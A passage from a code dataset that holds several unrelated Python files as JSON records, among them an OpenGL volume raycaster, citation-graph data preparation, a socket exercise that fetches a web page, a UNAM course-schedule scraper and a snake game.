glPixelStorei(GL_UNPACK_ALIGNMENT,1)\n glBindTexture(GL_TEXTURE_3D, self.texid)\n glTexParameterf(GL_TEXTURE_3D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameterf(GL_TEXTURE_3D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER)\n glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER)\n glTexParameteri(GL_TEXTURE_3D, GL_TEXTURE_WRAP_R, GL_CLAMP_TO_BORDER)\n glTexImage3D(GL_TEXTURE_3D, 0, internal_format, self.dim_tex[0], self.dim_tex[1], self.dim_tex[2], 0, format, GL_FLOAT, self.data)\n glBindTexture(GL_TEXTURE_3D, 0)\n\n self.data = None\n###################################################################################################################\nclass FBO_bbox:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n\n self.fbo = glGenFramebuffers(1)\n glBindFramebuffer(GL_FRAMEBUFFER, self.fbo)\n\n self.buf_back = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, self.buf_back)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER)\n glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA32F, width, height, 0, GL_RGBA, GL_FLOAT, None)\n glBindTexture(GL_TEXTURE_2D, 0)\n\n self.buf_front = glGenTextures(1)\n glBindTexture(GL_TEXTURE_2D, self.buf_front)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_BORDER)\n glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_BORDER)\n glTexImage2D(GL_TEXTURE_2D, 0,GL_RGBA32F, width, height, 0, GL_RGBA, GL_FLOAT, None)\n glBindTexture(GL_TEXTURE_2D, 0)\n\n self.rbo = glGenRenderbuffers(1)\n 
glBindRenderbuffer(GL_RENDERBUFFER, self.rbo)\n glRenderbufferStorage(GL_RENDERBUFFER, GL_DEPTH_COMPONENT, width, height)\n glFramebufferRenderbuffer(GL_FRAMEBUFFER, GL_DEPTH_ATTACHMENT, GL_RENDERBUFFER, self.rbo)\n glBindRenderbuffer(GL_RENDERBUFFER, 0)\n\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n\n\n###################################################################################################################\nclass QuadFull:\n RENDER_MODE_BLINN_PHONG = 0\n RENDER_MODE_CURVATURE = 1\n NUM_RENDER_MODE = 2\n def __init__(self, volume, size_fbo):\n self.tex_bbox_back = volume.bbox.fbo.buf_back\n self.tex_bbox_front = volume.bbox.fbo.buf_front\n self.tex_volume = volume.texid\n\n self.render_mode = self.RENDER_MODE_CURVATURE\n\n uniforms = ['tex_back', 'tex_front', 'tex_volume', 'scale_axes', 'dim', \n 'level', 'scale_step', 'MV', 'render_mode', 'tex_colormap_2d']\n\n self.prog = Program('raycast_simple.vert', 'cc6_raycast_open.frag', uniforms)\n\n self.init_colormap()\n\n self.init_vao()\n\n self.scale_step = 0.001\n\n#------------------------------------------------------------------------------------------------------------------------ \n def init_vao(self):\n verts = np.array(\n [-1, -1, 0, 0,\n 1, -1, 1, 0,\n 1, 1, 1, 1,\n -1, 1, 0, 1], dtype=np.float32)\n\n self.vao = glGenVertexArrays(1)\n glBindVertexArray(self.vao)\n self.vbo = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n glBufferData(GL_ARRAY_BUFFER, len(verts)*ctypes.sizeof(ctypes.c_float), verts, GL_STATIC_DRAW)\n glEnableVertexAttribArray(0)\n glVertexAttribPointer(0, 2, GL_FLOAT, GL_FALSE, 4*ctypes.sizeof(ctypes.c_float), None)\n glEnableVertexAttribArray(1)\n glVertexAttribPointer(1, 2, GL_FLOAT, GL_FALSE, 4*ctypes.sizeof(ctypes.c_float), ctypes.c_void_p(2*ctypes.sizeof(ctypes.c_float)))\n glBindVertexArray(0)\n#------------------------------------------------------------------------------------------------------------------------ \n def render_raycast_shading(self, level, volume, MV):\n\n glClearColor(0, 0, 0, 0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n glActiveTexture(GL_TEXTURE0)\n glBindTexture(GL_TEXTURE_2D, self.tex_bbox_back)\n glActiveTexture(GL_TEXTURE1)\n glBindTexture(GL_TEXTURE_2D, self.tex_bbox_front)\n glActiveTexture(GL_TEXTURE2)\n glBindTexture(GL_TEXTURE_3D, self.tex_volume)\n glActiveTexture(GL_TEXTURE3)\n glBindTexture(GL_TEXTURE_2D, self.tex_colormap_2d)\n\n glUseProgram(self.prog.id)\n\n glUniform1i(self.prog.uniform_locs['tex_back'], 0) \n glUniform1i(self.prog.uniform_locs['tex_front'], 1) \n glUniform1i(self.prog.uniform_locs['tex_volume'], 2)\n glUniform1i(self.prog.uniform_locs['tex_colormap_2d'], 3)\n glUniform1f(self.prog.uniform_locs['level'], level)\n glUniform3f(self.prog.uniform_locs['scale_axes'], volume.bbox.scale_axes[0], volume.bbox.scale_axes[1], volume.bbox.scale_axes[2])\n glUniform3f(self.prog.uniform_locs['dim'], volume.info.dim[0], volume.info.dim[1], volume.info.dim[2])\n glUniform1f(self.prog.uniform_locs['scale_step'], self.scale_step)\n glUniformMatrix4fv(self.prog.uniform_locs['MV'], 1, GL_FALSE, MV)\n glUniform1i(self.prog.uniform_locs['render_mode'], self.render_mode);\n\n glBindVertexArray(self.vao)\n glDrawArrays(GL_TRIANGLE_FAN, 0, 4)\n glBindVertexArray(0)\n\n#------------------------------------------------------------------------------------------------------------------------ \n def init_colormap(self):\n# 3x3 colormap for min-max curvature\n colormap_2d = np.array([[ 1, 0, 0], [ 1, 1, 0], [0,1,0],\n [.5,.5,.5], [.5,.5,.5], [0,1,1],\n 
[.5,.5,.5], [.5,.5,.5], [0,0,1]], dtype=np.float32)\n        self.tex_colormap_2d = glGenTextures(1)\n        glBindTexture(GL_TEXTURE_2D, self.tex_colormap_2d)\n        glPixelStorei(GL_UNPACK_ALIGNMENT,1)\n        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)\n        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)\n        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE)\n        glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE)\n\n        glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, 3, 3, 0, GL_RGB, GL_FLOAT, colormap_2d)\n\n###################################################################################################################\nclass Program:\n    def __init__(self, filename_vert, filename_frag, uniforms):\n        src_vert = open(filename_vert, 'r').read()\n        src_frag = open(filename_frag, 'r').read()\n        self.id = self.build(src_vert, src_frag, uniforms)\n\n#------------------------------------------------------------------------------------------------------------------------ \n    def compile(self, src, type):\n        id = glCreateShader(type)\n        glShaderSource(id, src)\n        glCompileShader(id)\n        result = glGetShaderiv(id, GL_COMPILE_STATUS)\n\n        if not result:\n            print('shader compilation error.')\n            print(glGetShaderInfoLog(id))\n            input('press any key to continue.')\n            raise RuntimeError(\n                \"\"\"Shader compile failure (%s): %s\"\"\" % (result, glGetShaderInfoLog(id),),\n                src, type,)\n        return id\n\n#------------------------------------------------------------------------------------------------------------------------ \n    def build(self, src_vert, src_frag, uniforms):\n        id_vert = self.compile(src_vert, GL_VERTEX_SHADER)\n        id_frag = self.compile(src_frag, GL_FRAGMENT_SHADER)\n        program = glCreateProgram()\n        if not program:\n            raise RuntimeError('glCreateProgram failed!')\n\n        glAttachShader(program, id_vert)\n        glAttachShader(program, id_frag)\n        glLinkProgram(program)\n        status = glGetProgramiv(program, GL_LINK_STATUS)\n        if not status:\n            infoLog = glGetProgramInfoLog(program)\n            glDeleteProgram(program)\n            glDeleteShader(id_vert)\n            glDeleteShader(id_frag)\n            print(infoLog)\n            raise RuntimeError(\"Error linking program:\\n%s\\n\" % infoLog)\n\n        self.uniform_locs = {}\n        for u in uniforms:\n            self.uniform_locs[u] = glGetUniformLocation(program, u)\n        return program\n\n\n###################################################################################################################\nclass Scene: \n    def __init__(self, width, height):\n\n        self.width = width\n        self.height = height\n\n        self.view_angle = 21\n        self.angle_x = 320\n        self.angle_y = 0\n        self.position_x = 0\n        self.position_y = 0\n\n\n        volume_name = 'ML_25'\n#        volume_name = 'ML_50'\n\n        fbo_size = (width, height)\n\n        self.volume = Volume(volumes[volume_name], fbo_size)\n\n        self.quad_full = QuadFull(self.volume, fbo_size)\n\n        self.refresh_MVP()\n\n        self.texid = [self.volume.bbox.fbo.buf_front, self.volume.bbox.fbo.buf_back]\n\n        self.level = volumes[volume_name].level\n\n#------------------------------------------------------------------------------------------------------------------------ \n    def refresh_MVP(self):\n\n        self.P = glm.perspective(np.radians(self.view_angle), self.width/self.height, 1, 3)\n\n        self.MV = glm.translate(glm.mat4(), glm.vec3(self.position_x, self.position_y, -2))\n        self.MV = glm.rotate(self.MV, np.radians(self.angle_x), glm.vec3(1,0,0))\n        self.MV = glm.rotate(self.MV, np.radians(self.angle_y), glm.vec3(0,1,0))\n\n        self.MVP = np.array(self.P * self.MV)\n\n        self.MV = 
np.array(self.MV)\n#------------------------------------------------------------------------------------------------------------------------ \n def render_shading(self):\n self.volume.bbox.render_bbox(self.MVP)\n self.quad_full.render_raycast_shading(self.level, self.volume, self.MV) \n\n###################################################################################################################\nclass RenderWindow:\n def __init__(self):\n cwd = os.getcwd() # save current working directory\n glfw.init() # initialize glfw - this changes cwd\n os.chdir(cwd) # restore cwd\n\n glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)\n glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)\n glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL_TRUE)\n glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)\n \n self.width, self.height = 512, 512\n self.aspect = self.width/float(self.height)\n self.win = glfw.create_window(self.width, self.height, 'raycaster (cc6)', None, None)\n glfw.make_context_current(self.win)\n\n # for retina display...\n self.fb_width, self.fb_height = glfw.get_framebuffer_size(self.win)\n\n glEnable(GL_DEPTH_TEST)\n glClearColor(0.0, 0.0, 0.0,0.0)\n\n glfw.set_key_callback(self.win, self.onKeyboard)\n glfw.set_window_size_callback(self.win, self.onSize) \n\n self.scene = Scene(self.fb_width, self.fb_height)\n\n self.exitNow = False\n \n def onKeyboard(self, win, key, scancode, action, mods):\n if action == glfw.PRESS:\n # ESC to quit\n if key == glfw.KEY_ESCAPE: \n self.exitNow = True\n elif key == glfw.KEY_RIGHT:\n self.scene.angle_y = (self.scene.angle_y + 10) % 360\n self.scene.refresh_MVP()\n elif key == glfw.KEY_LEFT:\n self.scene.angle_y = (self.scene.angle_y - 10) % 360\n self.scene.refresh_MVP()\n elif key == glfw.KEY_UP:\n self.scene.angle_x = (self.scene.angle_x - 10) % 360\n self.scene.refresh_MVP()\n elif key == glfw.KEY_DOWN:\n self.scene.angle_x = (self.scene.angle_x + 10) % 360\n self.scene.refresh_MVP()\n elif key == glfw.KEY_EQUAL:\n self.scene.level = self.scene.level + set_step_level(mods)\n print(self.scene.level)\n elif key == glfw.KEY_MINUS:\n self.scene.level = self.scene.level - set_step_level(mods)\n print(self.scene.level)\n elif key == glfw.KEY_PAGE_UP:\n self.scene.view_angle = self.scene.view_angle - 1\n self.scene.refresh_MVP()\n print(self.scene.view_angle)\n elif key == glfw.KEY_PAGE_DOWN:\n self.scene.view_angle = self.scene.view_angle + 1\n self.scene.refresh_MVP()\n print(self.scene.view_angle)\n elif key == glfw.KEY_TAB:\n self.scene.quad_full.render_mode = (self.scene.quad_full.render_mode + 1) % self.scene.quad_full.NUM_RENDER_MODE\n print(self.scene.quad_full.render_mode)\n \n def onSize(self, win, width, height):\n self.aspect = width/float(height)\n self.scene.width = width\n self.scene.height = height\n\n def run(self):\n glfw.set_time(0)\n glClearColor(1,1,1,1)\n lastT = glfw.get_time()\n frames = 0\n while not glfw.window_should_close(self.win) and not self.exitNow:\n currT = glfw.get_time()\n if frames == 20:\n elapsed = currT - lastT\n print('fps = {}'.format(frames/elapsed))\n lastT = currT\n frames = 0\n self.scene.render_shading()\n frames += 1\n glfw.swap_buffers(self.win)\n glfw.poll_events()\n glfw.terminate()\n\n# main() function\ndef main():\n print(\"Starting raycaster. 
\"\n \"Press ESC to quit.\")\n rw = RenderWindow()\n rw.run()\n\n# call main\nif __name__ == '__main__':\n main()\n","sub_path":"raycaster_cc6.py","file_name":"raycaster_cc6.py","file_ext":"py","file_size_in_byte":21470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"442184719","text":"\nfrom collections import defaultdict as dd\nimport random\nfrom scipy import sparse\nimport numpy as np\nfrom numpy import linalg as lin\n\ndef top_sort(in_edges):\n g_order, new_update = [1], [1]\n in_d = {}\n mat = set()\n for k, edges in in_edges.iteritems():\n in_d[k] = len(edges)\n for j in edges:\n mat.add((k, j))\n while True:\n new_new_update = []\n for k in in_edges.keys():\n if in_d[k] == 0: continue\n for j in new_update:\n if (k, j) in mat is not None: in_d[k] -= 1\n if in_d[k] == 0: new_new_update.append(k)\n if len(new_new_update) == 0:\n break\n for k in new_new_update:\n g_order.append(k)\n new_update = new_new_update\n return g_order\n\ndef read_cites(filename):\n cites = []\n for line in open(filename):\n cites.append(tuple(line.strip().split()))\n return cites\n\ndef read_content(filename):\n features, labels, label_set, num_f = dd(list), {}, set(), 0\n for line in open(filename):\n inputs = line.strip().split()\n id, label = inputs[0], inputs[-1]\n labels[id] = label\n label_set.add(label)\n for i in range(1, len(inputs) - 1):\n if float(inputs[i]) > 0:\n features[id].append((i - 1, 1.0))\n num_f = max(num_f, i)\n return features, labels, sorted(list(label_set)), num_f\n\ndef split_data(labels, perc):\n train, test = [], []\n random.seed(0)\n for id in labels.keys():\n rand = random.random()\n if rand < 0.7 * perc:\n train.append(id)\n elif rand > 0.7:\n test.append(id)\n return train, test\n\ndef construct_x_y(features, labels, label_list, num_f, ids):\n row, col, data = [], [], []\n y = np.zeros((len(ids), len(label_list)), dtype = np.int32)\n for i, id in enumerate(ids):\n for ff in features[id]:\n row.append(i)\n col.append(ff[0])\n data.append(ff[1])\n y[i, label_list.index(labels[id])] = 1.0\n x = sparse.coo_matrix((data, (row, col)), shape = (len(ids), num_f), dtype = np.float32).tocsr()\n return x, y\n\ndef get_index(keys):\n index = {}\n for i, id in enumerate(keys):\n index[id] = i\n return index\n\ndef gen_random_walk(cites, index):\n graph = dd(list)\n for id1, id2 in cites:\n graph[id1].append(id2)\n graph[id2].append(id1)\n\n g = []\n for _ in range(5):\n for id1 in graph.keys():\n path = [id1]\n for _ in range(10):\n path.append(random.choice(graph[path[-1]]))\n for i in range(len(path)):\n for j in range(i - 3, i + 3 + 1):\n if j < 0 or j >= len(path): continue\n if path[i] not in index or path[j] not in index: continue\n g.append([index[path[i]], index[path[j]]])\n return np.array(g, dtype = np.int32)\n\ndef gen_second(cites, index):\n graph = dd(list)\n for id1, id2 in cites:\n graph[id1].append(id2)\n graph[id2].append(id1)\n\n g = []\n for id1 in graph.keys():\n if id1 not in index: continue\n for id2 in graph[id1]:\n if id2 in index:\n g.append([index[id1], index[id2]])\n return np.array(g, dtype = np.int32)\n\ndef gen_graph_features(cites, ids):\n new_index = {}\n cnt = 0\n for id1, id2 in cites:\n if id1 not in new_index:\n new_index[id1] = cnt\n cnt += 1\n if id2 not in new_index:\n new_index[id2] = cnt\n cnt += 1\n\n row, col, data = [], [], []\n index = get_index(ids)\n for id1, id2 in cites:\n if id1 not in index: continue\n row.append(index[id1])\n col.append(new_index[id2])\n data.append(1.0)\n return 
sparse.coo_matrix((data, (row, col)), shape = (len(ids), cnt), dtype = np.float32).tocsr()\n\ndef read_params(filename):\n max_id = 0\n rec, label_set = [], set()\n for line in open(filename):\n if not line.startswith('f'): continue\n inputs = line.strip().split()\n w = float(inputs[1])\n inputs = inputs[0][3 :][: -1].split(',')\n id = int(inputs[0]) - 1\n label = inputs[1][1 :]\n\n max_id = max(id, max_id)\n label_set.add(label)\n rec.append((id, label, w))\n\n ret = {}\n for label in label_set:\n ret[label] = np.zeros((max_id + 1, 1), dtype = np.float32)\n for id, label, w in rec:\n ret[label][id, 0] = w\n return ret\n\ndef read_ids(filename):\n ids = []\n for line in open(filename):\n id = line.strip().split()[0].split('(')[1].split(',')[0].strip()\n ids.append(id)\n return ids\n\ndef gen_dataset(cite_file, corpus_file, perc, args):\n cites = read_cites(cite_file)\n features, labels, label_list, num_f = read_content(corpus_file)\n train_id, test_id = split_data(labels, perc)\n # train_id, test_id = read_ids('train.examples'), read_ids('test.examples')\n\n x, y = construct_x_y(features, labels, label_list, num_f, labels.keys())\n fea_vecs = {'f': sparse.hstack([x, gen_graph_features(cites, labels.keys())], format = 'csr')}\n # fea_vecs = {'f': x}\n ret_labels = {}\n for i, label in enumerate(label_list):\n ret_labels[label] = y[:, i]\n index = get_index(labels.keys())\n train_ind = [index[i] for i in train_id]\n test_ind = [index[i] for i in test_id]\n\n g, gy = {}, {}\n if args.entropy:\n g['entropy'] = np.arange(x.shape[0]).reshape((x.shape[0], 1))\n gy['entropy'] = np.ones(x.shape[0], dtype = np.float32) * 1e-1\n\n if args.manifold:\n g['manifold'] = gen_second(cites, index)\n gy['manifold'] = np.ones(g['manifold'].shape[0], dtype = np.float32) * 1e-4\n\n if args.cotrain:\n g['cotrain'] = np.arange(x.shape[0]).reshape((x.shape[0], 1))\n gy['cotrain'] = np.ones(x.shape[0], dtype = np.float32) * 1e-3\n\n # fea_vecs['g'] = sparse.hstack([x, gen_graph_features(cites, labels.keys())], format = 'csr')\n fea_vecs['g'] = gen_graph_features(cites, labels.keys())\n\n return fea_vecs, ret_labels, train_ind, test_ind, g, gy\n","sub_path":"compile/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"595305781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 14 17:05:59 2014\n\n@author: Alejandro\n\"\"\"\nfrom GaussianExperiment import GaussianExperiment\n#[Experiment 1]\ndef experiment(n_samples, n_outliers, n_clusters, n_features, n_experiment):\n gaussianExperiment = GaussianExperiment(n_samples = n_samples, \\\n n_outliers = n_outliers, n_clusters = n_clusters, \\\n n_features = n_features, n_experiment = n_experiment)\n\n X,y = gaussianExperiment.generate_data()\n X_contaminated = gaussianExperiment.generate_contamination()\n gaussianExperiment.show_graph_3d(X,y,X_contaminated)\n #gaussianExperiment.save_data()\n \nexperiment(n_samples= 300 , n_outliers = 150 , n_clusters = 4 \\\n , n_features =3 , n_experiment = 1)\n \nexperiment(n_samples= 300 , n_outliers = 150 , n_clusters = 4 \\\n , n_features =3 , n_experiment = 2)","sub_path":"matlab/+gaussian_experiment/second_code/ParameterExperiment.py","file_name":"ParameterExperiment.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"650052236","text":"def fibo(n):\n if n <= 1:\n return n\n else:\n return (fibo(n - 1) 
+ fibo(n - 2))\n\nntermos = eval(input('How many terms of the sequence do you want to print? '))\nwhile ntermos <= 0:\n    ntermos = eval(input('Enter a positive number: '))\nfor i in range(ntermos):\n    print(fibo(i+1))  # +1 is used so that \"0\", which is not part of the Fibonacci sequence, is not printed\n","sub_path":"fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"375898322","text":"# Exercise 2: Change your socket program so that it counts the number of\n# characters it has received and stops displaying any text after it has shown\n# 3000 characters. The program should retrieve the entire document and count\n# the total number of characters and display the count of the number of\n# characters at the end of the document.\n\n# This version of the program displays all received characters,\n# including the header data.\n\nimport socket\n\ngeturl = input(\"Please enter a URL: \")\n\ncount = 0\nsite = b\"\"\n\ntry:\n    getsock = geturl.split('/')\n\n    url = 'GET ' + geturl + ' HTTP/1.0\\r\\n\\r\\n'\n\n    mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    mysock.connect((getsock[2], 80))\n    cmd = url.encode()\n    mysock.send(cmd)\n\n    while True:\n        data = mysock.recv(512)\n        if len(data) < 1:\n            break\n        count += len(data)\n        site += data\n\n    mysock.close()\n\n    print(site[:3001].decode())\n    print(\"\\n\")\n    print('Total character count is:', count)\n\nexcept:\n    print('Error, improperly formatted or non-existent URL.')\n","sub_path":"Python/FreeCodeCamp/PY4E_Python_for_Everybody/ch_12_NetworkedPrograms/ex_12_02_01.py","file_name":"ex_12_02_01.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"325059714","text":"\"\"\" Convert JSON to relevant matrices. \"\"\"\n\nfrom pandas import DataFrame\n\ndef person_packages(data):\n    \"\"\" Person by Package Matrix. \"\"\"\n    ppm = []\n    for datum in data:\n        package_url = datum['package_url']\n        for participant in datum['participants']['participants']:\n            ppm.append((participant, package_url))\n\n    df = DataFrame(ppm)\n    df.columns = ['person', 'package']\n    return df\n\ndef packages_weights(data):\n    \"\"\" Package by Weights Matrix. \"\"\"\n    pwm = []\n    for datum in data:\n        pwm.append((datum['package_url'],\n                    datum['repo_activity']['repository_forks'],\n                    datum['repo_activity']['repository_stars'],\n                    datum['usage']['# Using This']))\n    pf = DataFrame(pwm)\n    pf.columns = ['package', 'repository_forks', 'repository_stars',\n                  'using_this']\n    return pf\n\n","sub_path":"Crawl/json_conversion.py","file_name":"json_conversion.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"29119314","text":"# -*- coding: utf-8 -*-\nfrom bs4 import BeautifulSoup  # HTML parser\nimport requests  # Download HTML\nimport re  # Regular expressions\nfrom urlparse import urljoin  # Get the URLs from the 'a' tags\nfrom collections import namedtuple\nimport logging\nimport sys\n\nCICLO = \"2015-2\"\nURL_HORARIOS = \"http://www.fciencias.unam.mx/docencia/horarios/indice/20152\"\n\n\nclass Materia(object):\n    \"\"\"docstring for Materia\"\"\"\n    def __init__(self, arg, nombre):\n        super(Materia).__init__()\n        self.id = id\n        self.nombre = nombre\n        self.carreras = list()\n\n\ndef crear_url_carreras(url_horarios, lista_tag_carreras):\n    Carrera = namedtuple('Carrera', 'identificador nombre plan url')\n    carreras = set()\n    for tag_carrera in lista_tag_carreras:\n        plan_re = re.search(\"\\d{4}\", tag_carrera.text)\n        if plan_re is None:  # If no plan year is found, skip the entry\n            continue\n        identificador = tag_carrera[\"href\"].split(\"/\")[-1]\n        nombre = tag_carrera.text\n        plan = plan_re.group(0)\n        url = urljoin(url_horarios, tag_carrera[\"href\"])\n        nueva_carrera = Carrera(identificador, nombre, plan, url)\n        carreras.add(nueva_carrera)\n    return carreras\n\n\ndef crear_url_materias(url_horarios, conjunto_carreas):\n    sys.stdout.write(\"Fetching the subjects\")  # python2: print without a line break\n    sys.stdout.flush()\n    Materia = namedtuple('Materia', 'identificador nombre carrera_id url')\n    materias = set()\n    for carrera in conjunto_carreas:\n        intentos = 10\n        while intentos:\n            try:\n                respuesta = requests.get(carrera.url, timeout=5)\n                respuesta.raise_for_status()  # Check the response status\n            except Exception:\n                intentos -= 1\n                if intentos == 0:\n                    logging.warning(\"The url: \" + carrera.url + \" could not be accessed\")\n                continue\n            break\n        sys.stdout.write(\".\")  # python2: print without a line break\n        sys.stdout.flush()\n        sopa_materias = BeautifulSoup(respuesta.text)\n        # Find the id that holds the links to the subjects\n        div_materias = sopa_materias.find(id=\"info-contenido\")\n        # Find the subject URLs\n        lista_tag_materias = div_materias.find_all(\"a\", href=re.compile(\"/docencia/\"))\n        for tag_materia in lista_tag_materias:\n            identificador = tag_materia[\"href\"].split(\"/\")[-1]\n            nombre = tag_materia.text.split(\",\")[0]\n            carrera_id = carrera.identificador\n            url = urljoin(url_horarios, tag_materia[\"href\"])\n            nueva_materia = Materia(identificador, nombre, carrera_id, url)\n            materias.add(nueva_materia)\n    print(\"\")\n    return materias\n\n\ndef crear_url_cursos(url_horarios, conjunto_materias):\n    sys.stdout.write(\"Fetching the courses\")  # python2: print without a line break\n    sys.stdout.flush()\n    Curso = namedtuple('Curso', 'identificador semestre profesores materia_id')\n    cursos = set()\n    for materia in conjunto_materias:\n        intentos = 10\n        while intentos:\n            try:\n                respuesta = requests.get(materia.url, timeout=5)\n                respuesta.raise_for_status()  # Check the response status\n            except Exception:\n                
\n\ndef crear_url_materias(url_horarios, conjunto_carreas):\n sys.stdout.write(\"Fetching the subjects\") # python2 idiom to print without a trailing newline\n sys.stdout.flush()\n Materia = namedtuple('Materia', 'identificador nombre carrera_id url')\n materias = set()\n for carrera in conjunto_carreas:\n intentos = 10\n while intentos:\n try:\n respuesta = requests.get(carrera.url, timeout=5)\n respuesta.raise_for_status() # Check the response status\n except Exception:\n intentos -= 1\n if intentos == 0:\n logging.warning(\"The URL: \" + carrera.url + \" could not be reached\")\n continue\n break\n sys.stdout.write(\".\") # python2 idiom to print without a trailing newline\n sys.stdout.flush()\n sopa_materias = BeautifulSoup(respuesta.text)\n # Find the element whose id holds the links to the subjects\n div_materias = sopa_materias.find(id=\"info-contenido\")\n # Find the subject URLs\n lista_tag_materias = div_materias.find_all(\"a\", href=re.compile(\"/docencia/\"))\n for tag_materia in lista_tag_materias:\n identificador = tag_materia[\"href\"].split(\"/\")[-1]\n nombre = tag_materia.text.split(\",\")[0]\n carrera_id = carrera.identificador\n url = urljoin(url_horarios, tag_materia[\"href\"])\n nueva_materia = Materia(identificador, nombre, carrera_id, url)\n materias.add(nueva_materia)\n print(\"\")\n return materias\n\n\ndef crear_url_cursos(url_horarios, conjunto_materias):\n sys.stdout.write(\"Fetching the courses\") # python2 idiom to print without a trailing newline\n sys.stdout.flush()\n Curso = namedtuple('Curso', 'identificador semestre profesores materia_id')\n cursos = set()\n for materia in conjunto_materias:\n intentos = 10\n while intentos:\n try:\n respuesta = requests.get(materia.url, timeout=5)\n respuesta.raise_for_status() # Check the response status\n except Exception:\n intentos -= 1\n if intentos == 0:\n logging.warning(\"The URL: \" + materia.url + \" could not be reached\")\n continue\n break\n sys.stdout.write(\".\") # python2 idiom to print without a trailing newline\n sys.stdout.flush()\n sopa_materias = BeautifulSoup(respuesta.text)\n # Find the element whose id holds the courses\n div_materias = sopa_materias.find(id=\"info-contenido\")\n # Inspect the children that carry the course rows\n for contenido in div_materias.children:\n print(contenido)\n break\n # pending: parsing the course rows into Curso tuples is not implemented yet\n print(\"\")\n return cursos\n\n\ndef obtener_paginas_de_cursos(url_horarios, ciclo):\n print(\"Fetching the degree programmes\")\n cursos_html = set()\n # Process the page for the school term\n intentos = 10\n while intentos:\n try:\n respuesta = requests.get(url_horarios, timeout=5)\n respuesta.raise_for_status() # Check the response status\n except Exception:\n intentos -= 1\n if intentos == 0:\n logging.warning(\"Could not reach the faculty page\")\n return\n continue\n break\n sopa_carreras = BeautifulSoup(respuesta.text)\n # Find the element whose id holds the links to the degree programmes\n div_carreras = sopa_carreras.find(id=\"info-contenido\")\n if div_carreras is None:\n raise Exception(\"The programmes div was not found\")\n # Find the programme URLs\n url_carreras = div_carreras.find_all(\"a\", href=re.compile(\"/indiceplan/\"))\n if len(url_carreras) == 0:\n raise Exception(\"No programme URLs were found\")\n carreras = crear_url_carreras(url_horarios, url_carreras)\n materias = crear_url_materias(url_horarios, carreras)\n cursos = crear_url_cursos(url_horarios, materias)\n return cursos_html\n\n\ndef main():\n cursos_crudos = obtener_paginas_de_cursos(URL_HORARIOS, CICLO)\n pass\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"back_end/python/obtiene_horarios.py","file_name":"obtiene_horarios.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"556314401","text":"import random\n\nclass Segment:\n\n def __init__ (self, X, Y):\n self.X = int(X)\n self.Y = int(Y)\n \n def setNext (self, next):\n self.next = next\n\nclass Snake:\n\n def __init__ (self, head, tail):\n self.head = head\n self.tail = tail\n self.length = 3\n self.direction = \"down\"\n \n def move(self):\n nextX = self.head.X\n nextY = self.head.Y\n nextSeg = self.head.next\n if self.direction == \"up\": \n self.head.Y -= 1\n elif self.direction == \"down\":\n self.head.Y += 1\n elif self.direction == \"right\":\n self.head.X += 1\n elif self.direction == \"left\":\n self.head.X -= 1\n\n for i in range(self.length-1):\n xBuff = nextSeg.X\n yBuff = nextSeg.Y\n nextSeg.X = nextX\n nextSeg.Y = nextY\n if (i < self.length-2):\n nextSeg = nextSeg.next\n nextX = xBuff\n nextY = yBuff\n
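A quick way to sanity-check the linked-segment movement in Snake.move() above is to wire three Segments together by hand and step once; the wiring below is illustrative only, since the original file never shows how head, tail and the next links are assembled.

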